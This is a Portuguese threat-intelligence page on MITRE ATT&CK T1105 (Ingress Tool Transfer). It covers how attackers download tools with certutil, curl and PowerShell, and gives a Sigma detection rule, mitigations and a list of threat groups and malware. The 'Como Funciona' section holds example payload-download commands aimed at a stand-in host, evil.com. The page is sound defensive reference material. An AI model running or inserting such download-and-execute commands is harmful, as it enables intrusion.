# T1105 - Ingress Tool Transfer ## Descrição Ingress Tool Transfer é a técnica pela qual adversários transferem ferramentas, payloads ou arquivos auxiliares de um sistema externo sob seu controle para o ambiente comprometido. Em vez de empacotar tudo no malware inicial - o que aumentaria a detecção - os atacantes entram com um loader leve e baixam o arsenal completo depois que ganham acesso. Isso reduz a pegada inicial e permite adaptar as ferramentas ao ambiente específico da vítima sem precisar recompilar ou reenviar o implante original. No Windows, os adversários exploram utilitários legítimos já presentes no sistema: `certutil`, `bitsadmin`, `msiexec` e comandos [[t1059-001-powershell|PowerShell]] como `Invoke-WebRequest` ou `IEX(New-Object Net.WebClient).downloadString()`. Em sistemas Linux e macOS, `curl`, `wget`, `scp` e `rsync` são os favoritos - ferramentas universais que raramente disparam alertas por si só. Após o download, o atacante frequentemente verifica a integridade do arquivo via hash (`certutil -hashfile`) para garantir que o payload chegou íntegro. Em ambientes ESXi e dispositivos de rede, os mesmos binários nativos são reutilizados com a mesma finalidade. Uma variante mais sofisticada abusa de serviços de sincronização em nuvem - Dropbox, OneDrive, Google Drive - para entregar arquivos sem tráfego diretamente ao C2. O atacante compromete uma conta cloud, sobe o payload no portal web, e o cliente local sincroniza automaticamente para o disco da vítima. Esse método é particularmente difícil de bloquear porque o tráfego passa por domínios legítimos com certificados válidos. Após o ingress, o adversário pode usar [[t1570-lateral-tool-transfer|Lateral Tool Transfer]] para mover as ferramentas entre hosts dentro da rede interna. Geralmente o T1105 é acionado depois de acesso inicial via [[t1566-phishing|phishing]] ou exploração de vulnerabilidades, e antecede [[t1204-user-execution|User Execution]] e execução de payloads de segunda fase. **Contexto Brasil/LATAM:** No Brasil, o T1105 é amplamente usado por grupos de ransomware como [[g1043-blackbyte|BlackByte]] e por operadores de trojans bancários que precisam entregar módulos adicionais (webinjections, stealers) após o comprometimento inicial. O setor financeiro é o alvo mais frequente, mas infraestrutura crítica e governo também registram ocorrências. O [[g0080-cobalt-group|Cobalt Group]], conhecido por ataques a bancos na América Latina, usa sistematicamente essa técnica para implantar Cobalt Strike Beacon após obter acesso inicial via phishing direcionado a funcionários de tesouraria e TI bancária. ## Attack Flow ```mermaid graph TB A["T1566<br/>Phishing<br/>(Acesso Inicial)"] --> B["T1059<br/>Execução de<br/>Comando/Script"] B --> C["T1105<br/>Ingress Tool<br/>Transfer"]:::highlight C --> D["T1570<br/>Lateral Tool<br/>Transfer"] C --> E["T1059.001<br/>PowerShell /<br/>Execução de Payload"] classDef highlight fill:#e74c3c,color:#fff ``` ## Como Funciona 1. **Preparação:** O atacante hospeda o payload em infraestrutura controlada - servidor VPS, repositório GitHub comprometido, bucket S3 público ou serviço legítimo de compartilhamento de arquivos como [[t1102-web-service|Web Services]] (Dropbox, OneDrive). A escolha do host depende de quais domínios são permitidos pelo firewall da vítima. 2. **Execução do download:** Usando um shell ou implante já presente na máquina, o adversário invoca um utilitário nativo - `certutil -urlcache -split -f https://evil.com/payload.exe payload.exe`, `curl -o /tmp/agent https://evil.com/agent`, ou `Invoke-WebRequest -Uri https://evil.com/tool.ps1 -OutFile $env:TEMP\tool.ps1` - para baixar o arquivo. Geralmente o download ocorre para diretórios temporários (`%TEMP%`, `/tmp`) ou é mascarado com nome de processo legítimo. 3. **Verificação e execução:** Após o download, o hash pode ser válidado para confirmar integridade. O payload é então executado diretamente, movido para um local de persistência, ou descompactado para revelar componentes adicionais - iniciando a próxima fase da cadeia de ataque, como reconhecimento via [[t1082-system-information-discovery|System Information Discovery]] ou estabelecimento de C2 via [[t1071-001-web-protocols|Web Protocols]]. ## Detecção **Fontes de dados:** - **Windows Event Log 4688** - Criação de processos: monitorar `certutil.exe`, `bitsadmin.exe`, `mshta.exe`, `wscript.exe` com argumentos contendo URLs - **Sysmon Event ID 3** - Conexões de rede originadas por processos como `powershell.exe`, `cmd.exe`, `certutil.exe` para endereços externos - **Sysmon Event ID 11** - Criação de arquivos executáveis em diretórios temporários por processos não esperados - **Proxy/Firewall logs** - Downloads de executáveis (`.exe`, `.dll`, `.ps1`) por processos do sistema para destinos externos não categorizados - **EDR telemetry** - Anomalia comportamental: processo de sistema fazendo HTTP GET para IP externo não categorizado ou domínio recém-registrado **Sigma Rule:** ```yaml title: Ingress Tool Transfer via LOLBins id: a9b3e4c2-1f5d-4a8b-9c7e-0d2f6b3e1a4c status: experimental description: Detecta download de arquivos via utilitários nativos do Windows (certutil, bitsadmin, powershell) logsource: category: process_creation product: windows detection: selection_certutil: Image|endswith: '\certutil.exe' CommandLine|contains: - '-urlcache' - '-decode' - 'http' selection_bitsadmin: Image|endswith: '\bitsadmin.exe' CommandLine|contains: - '/transfer' - 'http' selection_powershell: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains: - 'DownloadFile' - 'DownloadString' - 'Invoke-WebRequest' - 'WebClient' - 'iwr ' condition: 1 of selection_* falsepositives: - Atualizações legítimas de software via scripts internos de TI - Ferramentas de administração que usam certutil para válidar certificados level: medium tags: - attack.command_and_control - attack.t1105 ``` ## Mitigação | Mitigação | Recomendação Prática | |-----------|---------------------| | [[m1031-network-intrusion-prevention\|M1031 - Network Intrusion Prevention]] | Implementar inspeção de conteúdo (IDS/IPS) no tráfego egresso para detectar downloads de executáveis mascarados em tráfego HTTP/HTTPS. Usar proxies com categorização de URL para bloquear domínios não classificados ou recém-registrados (menos de 30 dias). Habilitar SSL inspection no gateway de saída para inspecionar tráfego HTTPS. | | [[m1037-filter-network-traffic\|M1037 - Filter Network Traffic]] | Bloquear acesso direto à internet de servidores internos e workstations - todo tráfego externo deve passar por proxy autenticado com log completo. Criar allowlist de domínios legítimos de software corporativo e bloquear o restante como padrão. Alertar sobre conexões de `certutil.exe`, `bitsadmin.exe` e `powershell.exe` para destinos externos não autorizados. | ## Threat Actors Os seguintes grupos são conhecidos por usar T1105 ativamente em suas operações: - [[g0117-fox-kitten|Fox Kitten]] - APT iraniano; usa T1105 para implantar webshells e ferramentas de tunelamento após exploração de dispositivos VPN e firewalls - [[g1002-bitter|BITTER]] - APT sul-asiático; entrega implantes adicionais via download em campanhas de spear-phishing direcionadas a governo e defesa - [[g0125-silk-typhoon|HAFNIUM]] - APT chinês; explorou Exchange Servers e usou T1105 para baixar webshells, China Chopper e ferramentas de exfiltração - [[g0080-cobalt-group|Cobalt Group]] - operadores especializados em ATM malware; usam T1105 para entregar Cobalt Strike Beacon em redes bancárias da América Latina - [[g1021-cinnamon-tempest|Cinnamon Tempest]] - grupo de ransomware; usa T1105 para staging de payloads de criptografia antes do ataque final - [[g1043-blackbyte|BlackByte]] - ransomware com presença documentada no Brasil; usa T1105 extensivamente no staging pré-criptografia - [[g0081-tropic-trooper|Tropic Trooper]] - APT com foco em Taiwan e Filipinas; usa T1105 para atualizar implantes remotamente via [[s1228-pubload|PUBLOAD]] - [[g1015-scattered-spider|Scattered Spider]] - combina engenharia social com T1105 para implantar ferramentas de movimentação lateral e AnyDesk - [[g0032-lazarus-group|Lazarus Group]] - APT norte-coreano; usa T1105 em múltiplas campanhas incluindo ataques ao setor financeiro e criptomoedas na LATAM - [[g0068-platinum|PLATINUM]] - APT altamente furtivo; usa T1105 com protocolos alternativos para evitar proxies corporativos e controles de rede ## Software Associado - [[s0396-evilbunny|EvilBunny]] (malware) - backdoor que usa T1105 para baixar módulos adicionais sob demanda do operador - [[s0664-pandora|Pandora]] (malware) - ransomware que realiza staging via T1105 antes da fase de criptografia - [[s0444-shimrat|ShimRat]] (malware) - RAT que usa T1105 para atualizar seus próprios componentes e plugins - [[s1228-pubload|PUBLOAD]] (malware) - stager usado por Tropic Trooper, projetado específicamente para T1105 - [[s1118-bushwalk|BUSHWALK]] (malware) - webshell que usa T1105 para implantar ferramentas adicionais no servidor comprometido - [[s1066-darktortilla|DarkTortilla]] (malware) - crypter/loader .NET que usa T1105 para baixar e descriptografar payload final - [[s0627-sodamaster|SodaMaster]] (malware) - implante de HAFNIUM que usa T1105 para stagear ferramentas de reconhecimento - [[s1019-shark|Shark]] (malware) - backdoor modular que baixa plugins via T1105 conforme necessário - [[s0284-moreeggs|More_eggs]] (malware) - JScript backdoor usado por grupos criminosos que usa T1105 para entregar cargas adicionais - [[s0185-seasharpee|SEASHARPEE]] (malware) - webshell C# com capacidade nativa de download e execução via T1105 --- *Fonte: [MITRE ATT&CK - T1105](https://attack.mitre.org/techniques/T1105)*